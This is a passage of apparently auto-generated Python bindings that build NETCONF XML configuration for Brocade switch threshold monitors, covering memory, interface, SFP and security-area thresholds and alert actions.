        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Memory")
    ET.SubElement(node, "limit").text = kwargs.pop('limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_high_limit(self, **kwargs):
    """Set threshold-monitor/Memory/high-limit; pops 'high_limit' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Memory")
    ET.SubElement(node, "high-limit").text = kwargs.pop('high_limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_low_limit(self, **kwargs):
    """Set threshold-monitor/Memory/low-limit; pops 'low_limit' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Memory")
    ET.SubElement(node, "low-limit").text = kwargs.pop('low_limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_actions(self, **kwargs):
    """Set threshold-monitor/Memory/actions; pops 'actions' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Memory")
    ET.SubElement(node, "actions").text = kwargs.pop('actions')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_apply(self, **kwargs):
    """Set threshold-monitor/interface/apply; pops 'apply' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "interface")
    ET.SubElement(node, "apply").text = kwargs.pop('apply')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_pause(self, **kwargs):
    """Emit an empty threshold-monitor/interface/pause node.

    NOTE(review): <pause> carries no text here — presumably a YANG
    presence/empty leaf; confirm against the Brocade model.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    ET.SubElement(ET.SubElement(monitor, "interface"), "pause")
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_policy_name(self, **kwargs):
    """Set interface/policy/policy_name; pops 'policy_name' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_type(self, **kwargs):
    """Set interface/policy/area/type.

    Pops 'policy_name', 'area_value' (keys) and 'type', then
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    # local named type_node to avoid shadowing the builtin `type`
    type_node = ET.SubElement(area, "type")
    type_node.text = kwargs.pop('type')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_area_value(self, **kwargs):
    """Set interface/policy/area/area_value.

    Pops 'policy_name', 'type' (keys) and 'area_value', then
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_timebase_value(self, **kwargs):
    """Set interface/policy/area/threshold/timebase_value.

    Pops 'policy_name', 'type', 'area_value' (keys) and
    'timebase_value', then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "timebase_value").text = kwargs.pop('timebase_value')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_high_threshold(self, **kwargs):
    """Set interface/policy/area/threshold/high-threshold.

    Pops 'policy_name', 'type', 'area_value' (keys) and
    'high_threshold', then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "high-threshold").text = kwargs.pop('high_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_low_threshold(self, **kwargs):
    """Set interface/policy/area/threshold/low-threshold.

    Pops 'policy_name', 'type', 'area_value' (keys) and
    'low_threshold', then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "low-threshold").text = kwargs.pop('low_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_buffer(self, **kwargs):
    """Set interface/policy/area/threshold/buffer.

    Pops 'policy_name', 'type', 'area_value' (keys) and 'buffer',
    then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "buffer").text = kwargs.pop('buffer')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_highthresh_action(self, **kwargs):
    """Set interface/policy/area/alert/above/above-highthresh-action.

    Pops the policy/area keys plus 'above_highthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    above = ET.SubElement(ET.SubElement(area, "alert"), "above")
    ET.SubElement(above, "above-highthresh-action").text = kwargs.pop('above_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_lowthresh_action(self, **kwargs):
    """Set interface/policy/area/alert/above/above-lowthresh-action.

    Pops the policy/area keys plus 'above_lowthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    above = ET.SubElement(ET.SubElement(area, "alert"), "above")
    ET.SubElement(above, "above-lowthresh-action").text = kwargs.pop('above_lowthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_highthresh_action(self, **kwargs):
    """Set interface/policy/area/alert/below/below-highthresh-action.

    Pops the policy/area keys plus 'below_highthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    below = ET.SubElement(ET.SubElement(area, "alert"), "below")
    ET.SubElement(below, "below-highthresh-action").text = kwargs.pop('below_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
    """Set interface/policy/area/alert/below/below-lowthresh-action.

    Pops the policy/area keys plus 'below_lowthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "interface"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    below = ET.SubElement(ET.SubElement(area, "alert"), "below")
    ET.SubElement(below, "below-lowthresh-action").text = kwargs.pop('below_lowthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_apply(self, **kwargs):
    """Set threshold-monitor/sfp/apply; pops 'apply' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "sfp")
    ET.SubElement(node, "apply").text = kwargs.pop('apply')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_pause(self, **kwargs):
    """Emit an empty threshold-monitor/sfp/pause node.

    NOTE(review): <pause> carries no text here — presumably a YANG
    presence/empty leaf; confirm against the Brocade model.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    ET.SubElement(ET.SubElement(monitor, "sfp"), "pause")
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_policy_name(self, **kwargs):
    """Set sfp/policy/policy_name; pops 'policy_name' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_type(self, **kwargs):
    """Set sfp/policy/area/type.

    Pops 'policy_name', 'area_value' (keys) and 'type', then
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    # local named type_node to avoid shadowing the builtin `type`
    type_node = ET.SubElement(area, "type")
    type_node.text = kwargs.pop('type')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_area_value(self, **kwargs):
    """Set sfp/policy/area/area_value.

    Pops 'policy_name', 'type' (keys) and 'area_value', then
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_high_threshold(self, **kwargs):
    """Set sfp/policy/area/threshold/high-threshold.

    Pops 'policy_name', 'type', 'area_value' (keys) and
    'high_threshold', then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "high-threshold").text = kwargs.pop('high_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_low_threshold(self, **kwargs):
    """Set sfp/policy/area/threshold/low-threshold.

    Pops 'policy_name', 'type', 'area_value' (keys) and
    'low_threshold', then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "low-threshold").text = kwargs.pop('low_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_buffer(self, **kwargs):
    """Set sfp/policy/area/threshold/buffer.

    Pops 'policy_name', 'type', 'area_value' (keys) and 'buffer',
    then dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    threshold = ET.SubElement(area, "threshold")
    ET.SubElement(threshold, "buffer").text = kwargs.pop('buffer')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_above_above_highthresh_action(self, **kwargs):
    """Set sfp/policy/area/alert/above/above-highthresh-action.

    Pops the policy/area keys plus 'above_highthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    above = ET.SubElement(ET.SubElement(area, "alert"), "above")
    ET.SubElement(above, "above-highthresh-action").text = kwargs.pop('above_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_highthresh_action(self, **kwargs):
    """Set sfp/policy/area/alert/below/below-highthresh-action.

    Pops the policy/area keys plus 'below_highthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    below = ET.SubElement(ET.SubElement(area, "alert"), "below")
    ET.SubElement(below, "below-highthresh-action").text = kwargs.pop('below_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
    """Set sfp/policy/area/alert/below/below-lowthresh-action.

    Pops the policy/area keys plus 'below_lowthresh_action' and
    dispatches the <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "sfp"), "policy")
    ET.SubElement(policy, "policy_name").text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "type").text = kwargs.pop('type')
    ET.SubElement(area, "area_value").text = kwargs.pop('area_value')
    below = ET.SubElement(ET.SubElement(area, "alert"), "below")
    ET.SubElement(below, "below-lowthresh-action").text = kwargs.pop('below_lowthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_apply(self, **kwargs):
    """Set threshold-monitor/security/apply; pops 'apply' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "security")
    ET.SubElement(node, "apply").text = kwargs.pop('apply')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_pause(self, **kwargs):
    """Emit an empty threshold-monitor/security/pause node.

    NOTE(review): <pause> carries no text here — presumably a YANG
    presence/empty leaf; confirm against the Brocade model.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    ET.SubElement(ET.SubElement(monitor, "security"), "pause")
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_sec_policy_name(self, **kwargs):
    """Set security/policy/sec_policy_name; pops 'sec_policy_name' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "security"), "policy")
    ET.SubElement(policy, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_sec_area_value(self, **kwargs):
    """Build a <config> setting security/policy/area/sec_area_value.

    Pops the list key 'sec_policy_name' and then the leaf 'sec_area_value'
    from kwargs (KeyError if absent); dispatches via kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_timebase(self, **kwargs):
    """Build a <config> setting security/policy/area/timebase.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'timebase' (KeyError if any is absent); dispatches via kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    ET.SubElement(area_el, "timebase").text = kwargs.pop('timebase')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_high_threshold(self, **kwargs):
    """Build a <config> setting security/policy/area/threshold/sec-high-threshold.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'sec_high_threshold'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "sec-high-threshold").text = kwargs.pop('sec_high_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_low_threshold(self, **kwargs):
    """Build a <config> setting security/policy/area/threshold/sec-low-threshold.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'sec_low_threshold'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "sec-low-threshold").text = kwargs.pop('sec_low_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_buffer(self, **kwargs):
    """Build a <config> setting security/policy/area/threshold/sec-buffer.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'sec_buffer'; dispatches via kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "sec-buffer").text = kwargs.pop('sec_buffer')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_above_sec_above_highthresh_action(self, **kwargs):
    """Build a <config> setting security/policy/area/alert/above/sec-above-highthresh-action.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'sec_above_highthresh_action'; dispatches via kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    above_el = ET.SubElement(ET.SubElement(area_el, "alert"), "above")
    ET.SubElement(above_el, "sec-above-highthresh-action").text = kwargs.pop('sec_above_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_highthresh_action(self, **kwargs):
    """Build a <config> setting security/policy/area/alert/below/sec-below-highthresh-action.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'sec_below_highthresh_action'; dispatches via kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    below_el = ET.SubElement(ET.SubElement(area_el, "alert"), "below")
    ET.SubElement(below_el, "sec-below-highthresh-action").text = kwargs.pop('sec_below_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_lowthresh_action(self, **kwargs):
    """Build a <config> setting security/policy/area/alert/below/sec-below-lowthresh-action.

    Pops list keys 'sec_policy_name' and 'sec_area_value', then the leaf
    'sec_below_lowthresh_action'; dispatches via kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "security")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "sec_area_value").text = kwargs.pop('sec_area_value')
    below_el = ET.SubElement(ET.SubElement(area_el, "alert"), "below")
    ET.SubElement(below_el, "sec-below-lowthresh-action").text = kwargs.pop('sec_below_lowthresh_action')
